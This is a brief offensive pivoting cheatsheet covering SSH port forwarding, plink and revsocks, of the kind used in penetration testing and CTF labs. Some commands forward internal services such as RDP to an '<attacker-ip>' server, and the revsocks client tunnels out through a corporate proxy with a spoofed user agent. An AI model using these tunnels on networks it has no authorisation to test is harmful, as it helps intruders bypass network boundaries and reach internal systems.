Pivoting cheatsheet
===================

[[_TOC_]]

#### SSH tunneling
##### Useful flags

    -N Do not execute a remote command.  This is useful for just forwarding ports.
    -f Requests ssh to go to background just before command execution.

##### Local port forwarding

    ssh -L <local-bind-port>:<target-ip>:<target-port> <user>@<server> -p <ssh-port>

e.g.

    ssh -L 8080:example.com:80 user@localhost -p 22
    curl http://localhost:8080

##### Remote port forwarding
Forward 127.0.0.1's <local-port> to <attacker-ip>'s <remote-bind-port>
Use SSH credentials for <attacker-ip>'s SSH server and specify <ssh-port>

    ssh -R <remote-bind-port>:127.0.0.1:<local-port> <user>@<attacker-ip> -p <ssh-port>

##### Dynamic port forwarding (SOCKS4 proxy)
Bind <local-bind-port> to localhost to act as SOCKS4 proxy to <server>

    ssh -D <local-bind-port> <user>@<server> -p <port>

e.g.

    ssh -D 9050 user@192.168.1.2
    proxychains nc 192.168.2.3 21


#### plink
##### Remote port forwarding
Forward 127.0.0.1's <local-port> to <attacker-ip>'s <remote-bind-port>

    plink.exe -l <user> -pw <password> <attacker-ip> -R <remote-bind-port>:127.0.0.1:<local-port> -P <ssh-port>

e.g.
Forward localhost's RDP 3389 port to <ssh-server>'s 3390 port

    plink.exe -l root -pw toor <ssh-server> -R 3390:127.0.0.1:3389

#### revsocks
##### Server

    revsocks -listen :8443 -socks 127.0.0.1:1080 -pass Passw0rd!

##### Client

    revsocks -connect 10.10.10.10:8443 -pass Passw0rd!
    revsocks -connect 10.10.10.10:8443 -pass Passw0rd! -proxy proxy.domain.local:3128 -proxyauth Domain/user:pass -useragent "Mozilla 5.0/IE Windows 10"
